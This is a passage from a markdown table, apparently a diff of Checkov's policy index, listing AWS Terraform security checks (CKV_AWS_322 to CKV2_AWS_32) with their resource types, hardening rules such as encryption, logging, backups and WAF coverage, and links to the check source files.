Redshift clusters use enhanced VPC routing | Terraform | [RedshiftClusterUseEnhancedVPCRouting.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterUseEnhancedVPCRouting.py) | +| 454 | CKV_AWS_322 | resource | aws_elasticache_cluster | Ensure ElastiCache for Redis cache clusters have auto minor version upgrades enabled | Terraform | [ElasticCacheAutomaticMinorUpgrades.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticMinorUpgrades.py) | +| 455 | CKV_AWS_323 | resource | aws_elasticache_cluster | Ensure ElastiCache clusters do not use the default subnet group | Terraform | [ElastiCacheHasCustomSubnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElastiCacheHasCustomSubnet.py) | +| 456 | CKV_AWS_324 | resource | aws_rds_cluster | Ensure that RDS Cluster log capture is enabled | Terraform | [RDSClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterLogging.py) | +| 457 | CKV_AWS_325 | resource | aws_rds_cluster | Ensure that RDS Cluster audit logging is enabled for MySQL engine | Terraform | [RDSClusterAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuditLogging.py) | +| 458 | CKV_AWS_326 | resource | aws_rds_cluster | Ensure that RDS Aurora Clusters have backtracking enabled | Terraform | [RDSClusterAuroraBacktrack.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuroraBacktrack.py) | +| 459 | CKV_AWS_327 | resource | aws_rds_cluster | Ensure RDS Clusters are encrypted using KMS CMKs | Terraform | [RDSClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncryptedWithCMK.py) | +| 460 | CKV_AWS_328 | resource | aws_alb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | +| 461 | CKV_AWS_328 | resource | aws_elb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | +| 462 | CKV_AWS_328 | resource | aws_lb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | +| 463 | CKV_AWS_329 | resource | aws_efs_access_point | EFS access points should enforce a root directory | Terraform | [EFSAccessPointRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessPointRoot.py) | +| 464 | CKV_AWS_330 | resource | aws_efs_access_point | EFS access points should enforce a user identity | Terraform | [EFSAccessUserIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessUserIdentity.py) | +| 465 | CKV_AWS_331 | resource | aws_ec2_transit_gateway | Ensure Transit Gateways do not automatically accept VPC attachment requests | Terraform | [Ec2TransitGatewayAutoAccept.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/Ec2TransitGatewayAutoAccept.py) | +| 466 | CKV_AWS_332 | resource | aws_ecs_service | Ensure ECS Fargate services run on the latest Fargate platform version | Terraform | [ECSServiceFargateLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServiceFargateLatest.py) | +| 467 | CKV_AWS_333 | resource | aws_ecs_service | Ensure ECS services do not have public IP addresses assigned to them automatically | Terraform | [ECSServicePublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServicePublicIP.py) | +| 468 | CKV_AWS_334 | resource | aws_ecs_task_definition | Ensure ECS containers should run as non-privileged | Terraform | [ECSContainerPrivilege.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerPrivilege.py) | +| 469 | CKV_AWS_335 | resource | aws_ecs_task_definition | Ensure ECS task definitions should not share the host's process namespace | Terraform | [ECSContainerHostProcess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerHostProcess.py) | +| 470 | CKV_AWS_336 | resource | aws_ecs_task_definition | Ensure ECS containers are limited to read-only access to root filesystems | Terraform | [ECSContainerReadOnlyRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerReadOnlyRoot.py) | +| 471 | CKV_AWS_337 | resource | aws_ssm_parameter | Ensure SSM parameters are using KMS CMK | Terraform | [SSMParameterUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py) | +| 472 | CKV_AWS_338 | resource | aws_cloudwatch_log_group | Ensure CloudWatch log groups retains logs for at least 1 year | Terraform | [CloudWatchLogGroupRetentionYear.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetentionYear.py) | +| 473 | CKV_AWS_339 | resource | aws_eks_cluster | Ensure EKS clusters run on a supported Kubernetes version | Terraform | [EKSPlatformVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py) | +| 474 | CKV_AWS_340 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk managed platform updates are enabled | Terraform | [ElasticBeanstalkUseManagedUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseManagedUpdates.py) | +| 475 | CKV_AWS_341 | resource | aws_launch_configuration | Ensure Launch template should not have a metadata response hop limit greater than 1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) | +| 476 | CKV_AWS_341 | resource | aws_launch_template | Ensure Launch template should not have a metadata response hop limit greater than 1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) | +| 477 | CKV_AWS_342 | resource | aws_waf_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | +| 478 | CKV_AWS_342 | resource | aws_waf_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | +| 479 | CKV_AWS_342 | resource | aws_wafregional_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | +| 480 | CKV_AWS_342 | resource | aws_wafregional_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | +| 481 | CKV_AWS_342 | resource | aws_wafv2_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | +| 482 | CKV_AWS_342 | resource | aws_wafv2_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | +| 483 | CKV_AWS_343 | resource | aws_redshift_cluster | Ensure Amazon Redshift clusters should have automatic snapshots enabled | Terraform | [RedshiftClusterAutoSnap.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAutoSnap.py) | +| 484 | CKV_AWS_344 | resource | aws_networkfirewall_firewall | Ensure that Network firewalls have deletion protection enabled | Terraform | [NetworkFirewallDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallDeletionProtection.py) | +| 485 | CKV_AWS_345 | resource | aws_networkfirewall_firewall | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) | +| 486 | CKV_AWS_345 | resource | aws_networkfirewall_rule_group | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) | +| 487 | CKV_AWS_346 | resource | aws_networkfirewall_firewall_policy | Ensure Network Firewall Policy defines an encryption configuration that uses a customer managed Key (CMK) | Terraform | [NetworkFirewallPolicyDefinesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallPolicyDefinesCMK.py) | +| 488 | CKV_AWS_347 | resource | aws_neptune_cluster | Ensure Neptune is encrypted by KMS using a customer managed Key (CMK) | Terraform | [NeptuneClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterEncryptedWithCMK.py) | +| 489 | CKV_AWS_348 | resource | aws_iam_access_key | Ensure IAM root user doesnt have Access keys | Terraform | [IAMUserRootAccessKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserRootAccessKeys.py) | +| 490 | CKV_AWS_349 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts local disks | Terraform | [EMRClusterConfEncryptsLocalDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsLocalDisk.py) | +| 491 | CKV_AWS_350 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts EBS disks | Terraform | [EMRClusterConfEncryptsEBS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsEBS.py) | +| 492 | CKV_AWS_351 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts InTransit | Terraform | [EMRClusterConfEncryptsInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsInTransit.py) | +| 493 | CKV_AWS_352 | resource | aws_network_acl_rule | Ensure NACL ingress does not allow all Ports | Terraform | [NetworkACLUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestricted.py) | +| 494 | CKV_AWS_353 | resource | aws_db_instance | Ensure that RDS instances have performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) | +| 495 | CKV_AWS_353 | resource | aws_rds_cluster_instance | Ensure that RDS instances have performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) | +| 496 | CKV_AWS_354 | resource | aws_db_instance | Ensure RDS Performance Insights are encrypted using KMS CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) | +| 497 | CKV_AWS_354 | resource | aws_rds_cluster_instance | Ensure RDS Performance Insights are encrypted using KMS CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) | +| 498 | CKV_AWS_355 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | +| 499 | CKV_AWS_355 | resource | aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | +| 500 | CKV_AWS_355 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | +| 501 | CKV_AWS_355 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | +| 502 | CKV_AWS_355 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | +| 503 | CKV_AWS_356 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [ResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/ResourcePolicyDocument.py) | +| 504 | CKV_AWS_357 | resource | aws_transfer_server | Ensure Transfer Server allows only secure protocols | Terraform | [TransferServerAllowsOnlySecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerAllowsOnlySecureProtocols.py) | +| 505 | CKV_AWS_358 | data | aws_iam_policy_document | Ensure GitHub Actions OIDC trust policies only allows actions from a specific known organization | Terraform | [GithubActionsOIDCTrustPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py) | +| 506 | CKV_AWS_359 | resource | aws_neptune_cluster | Neptune DB clusters should have IAM database authentication enabled | Terraform | [NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py) | +| 507 | CKV_AWS_360 | resource | aws_docdb_cluster | Ensure DocumentDB has an adequate backup retention period | Terraform | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBBackupRetention.py) | +| 508 | CKV_AWS_361 | resource | aws_neptune_cluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Terraform | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterBackupRetention.py) | +| 509 | CKV_AWS_362 | resource | aws_neptune_cluster | Neptune DB clusters should be configured to copy tags to snapshots | Terraform | [NeptuneDBClustersCopyTagsToSnapshots.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersCopyTagsToSnapshots.py) | +| 510 | CKV_AWS_363 | resource | aws_lambda_function | Ensure Lambda Runtime is not deprecated | Terraform | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py) | +| 511 | CKV_AWS_364 | resource | aws_lambda_permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Terraform | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaServicePermission.py) | +| 512 | CKV_AWS_365 | resource | aws_ses_configuration_set | Ensure SES Configuration Set enforces TLS usage | Terraform | [SesConfigurationSetDefinesTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SesConfigurationSetDefinesTLS.py) | +| 513 | CKV_AWS_366 | resource | aws_cognito_identity_pool | Ensure AWS Cognito identity pool does not allow unauthenticated guest access | Terraform | [CognitoUnauthenticatedIdentities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CognitoUnauthenticatedIdentities.py) | +| 514 | CKV2_AWS_1 | resource | aws_network_acl | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) | +| 515 | CKV2_AWS_1 | resource | aws_subnet | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) | +| 516 | CKV2_AWS_2 | resource | aws_ebs_volume | Ensure that only encrypted EBS volumes are attached to EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) | +| 517 | CKV2_AWS_2 | resource | aws_volume_attachment | Ensure that only encrypted EBS volumes are attached to EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) | +| 518 | CKV2_AWS_3 | resource | aws_guardduty_detector | Ensure GuardDuty is enabled to specific org/region | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) | +| 519 | CKV2_AWS_3 | resource | aws_guardduty_organization_configuration | Ensure GuardDuty is enabled to specific org/region | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) | +| 520 | CKV2_AWS_4 | resource | aws_api_gateway_method_settings | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) | +| 521 | CKV2_AWS_4 | resource | aws_api_gateway_stage | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) | +| 522 | CKV2_AWS_5 | resource | aws_security_group | Ensure that Security Groups are attached to another resource | Terraform | [SGAttachedToResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SGAttachedToResource.yaml) | +| 523 | CKV2_AWS_6 | resource | aws_s3_bucket | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) | +| 524 | CKV2_AWS_6 | resource | aws_s3_bucket_public_access_block | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) | +| 525 | CKV2_AWS_7 | resource | aws_emr_cluster | Ensure that Amazon EMR clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) | +| 526 | CKV2_AWS_7 | resource | aws_security_group | Ensure that Amazon EMR clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) | +| 527 | CKV2_AWS_8 | resource | aws_rds_cluster | Ensure that RDS clusters has backup plan of AWS Backup | Terraform | [RDSClusterHasBackupPlan.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSClusterHasBackupPlan.yaml) | +| 528 | CKV2_AWS_9 | resource | aws_backup_selection | Ensure that EBS are added in the backup plans of AWS Backup | Terraform | [EBSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EBSAddedBackup.yaml) | +| 529 | CKV2_AWS_10 | resource | aws_cloudtrail | Ensure CloudTrail trails are integrated with CloudWatch Logs | Terraform | [CloudtrailHasCloudwatch.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudtrailHasCloudwatch.yaml) | +| 530 | CKV2_AWS_11 | resource | aws_vpc | Ensure VPC flow logging is enabled in all VPCs | Terraform | [VPCHasFlowLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasFlowLog.yaml) | +| 531 | CKV2_AWS_12 | resource | aws_default_security_group | Ensure the default security group of every VPC restricts all traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) | +| 532 | CKV2_AWS_12 | resource | aws_vpc | Ensure the default security group of every VPC restricts all traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) | +| 533 | CKV2_AWS_14 | resource | aws_iam_group | Ensure that IAM groups includes at least one IAM user | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) | +| 534 | CKV2_AWS_14 | resource | aws_iam_group_membership | Ensure that IAM groups includes at least one IAM user | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) | +| 535 | CKV2_AWS_15 | resource | aws_autoscaling_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | +| 536 | CKV2_AWS_15 | resource | aws_elb | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | +| 537 | CKV2_AWS_15 | resource | aws_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | +| 538 | CKV2_AWS_16 | resource | aws_appautoscaling_target | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) | +| 539 | CKV2_AWS_16 | resource | aws_dynamodb_table | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) | +| 540 | CKV2_AWS_18 | resource | aws_backup_selection | Ensure that Elastic File System (Amazon EFS) file systems are added in the backup plans of AWS Backup | Terraform | [EFSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EFSAddedBackup.yaml) | +| 541 | CKV2_AWS_19 | resource | aws_eip | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) | +| 542 | CKV2_AWS_19 | resource | aws_eip_association | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) | +| 543 | CKV2_AWS_20 | resource | aws_alb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | +| 544 | CKV2_AWS_20 | resource | aws_alb_listener | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | +| 545 | CKV2_AWS_20 | resource | aws_lb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | +| 546 | CKV2_AWS_20 | resource | aws_lb_listener | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | +| 547 | CKV2_AWS_21 | resource | aws_iam_group_membership | Ensure that all IAM users are members of at least one IAM group. | Terraform | [IAMUsersAreMembersAtLeastOneGroup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUsersAreMembersAtLeastOneGroup.yaml) | +| 548 | CKV2_AWS_22 | resource | aws_iam_user | Ensure an IAM User does not have access to the console | Terraform | [IAMUserHasNoConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUserHasNoConsoleAccess.yaml) | +| 549 | CKV2_AWS_23 | resource | aws_route53_record | Route53 A Record has Attached Resource | Terraform | [Route53ARecordAttachedResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ARecordAttachedResource.yaml) | +| 550 | CKV2_AWS_27 | resource | aws_rds_cluster | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) | +| 551 | CKV2_AWS_27 | resource | aws_rds_cluster_parameter_group | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) | +| 552 | CKV2_AWS_28 | resource | aws_alb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) | +| 553 | CKV2_AWS_28 | resource | aws_lb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) | +| 554 | CKV2_AWS_29 | resource | aws_api_gateway_rest_api | Ensure public API gateway are protected by WAF | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) | +| 555 | CKV2_AWS_29 | resource | aws_api_gateway_stage | Ensure public API gateway are protected by WAF | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) | +| 556 | CKV2_AWS_30 | resource | aws_db_instance | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) | +| 557 | CKV2_AWS_30 | resource | aws_db_parameter_group | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) | +| 558 | CKV2_AWS_31 | resource | aws_wafv2_web_acl | Ensure WAF2 has a Logging Configuration | Terraform | [WAF2HasLogs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/WAF2HasLogs.yaml) | +| 559 | CKV2_AWS_32 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a response headers policy attached | Terraform | 